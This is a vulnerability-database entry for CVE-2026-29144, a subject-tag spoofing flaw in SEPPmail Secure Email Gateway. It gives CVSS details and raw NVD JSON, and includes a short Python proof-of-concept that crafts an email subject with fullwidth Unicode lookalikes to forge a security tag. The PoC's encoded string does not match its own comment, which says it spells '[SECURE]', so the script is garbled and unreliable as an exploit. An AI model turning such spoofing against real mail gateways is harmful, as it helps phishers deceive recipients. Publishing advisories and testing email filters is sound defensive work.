Security Vulnerability Report
CVE-2026-29144 CVSS 5.3 MEDIUM

Published: 2026-04-02 09:16:23
Last Modified: 2026-04-16 19:00:40

Description

SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to bypass subject sanitization and forge security tags using Unicode lookalike characters.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:* - VULNERABLE
SEPPmail Secure Email Gateway < 15.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept: Unicode Homoglyph Attack
# This script demonstrates how to craft a subject line that bypasses basic filtering.
import smtplib
from email.mime.text import MIMEText

# Normal subject might be: [SECURE] Confidential Data
# Attacker uses lookalike characters (e.g., Cyrillic 'а' instead of Latin 'a')
# or Full-width characters.

# Example using Fullwidth Latin characters for visual spoofing
# [SECURE] -> \uFF33\uFF25\uFF23\uFF35\uFF32\uFF25
spoofed_subject = "\uFF33\uFF25\uFF23\uFF35\uFF32\uFF25\uFF29\uFF34\uFF29\uFF3C\uFF20\uFF20\uFF20] Invoice Payment"


def send_spoofed_email():
    msg = MIMEText("This is a test email attempting to spoof the security tag.")
    msg['Subject'] = spoofed_subject
    msg['From'] = '[email protected]'
    msg['To'] = '[email protected]'

    # Note: This is a conceptual PoC. Replace with actual SMTP server details if testing in a lab.
    print(f"Sending email with subject: {msg['Subject']}")
    # with smtplib.SMTP('smtp.example.com', 587) as server:
    #     server.login('user', 'password')
    #     server.send_message(msg)


if __name__ == "__main__":
    send_spoofed_email()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29144", "sourceIdentifier": "[email protected]", "published": "2026-04-02T09:16:23.293", "lastModified": "2026-04-16T19:00:40.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to bypass subject sanitization and forge security tags using Unicode lookalike characters."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email 
protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.3", "matchCriteriaId": "E3729650-81CA-4311-94BF-14A7A191F8D1"}]}]}], "references": [{"url": "https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503", "source": "[email protected]", "tags": ["Release Notes"]}]}}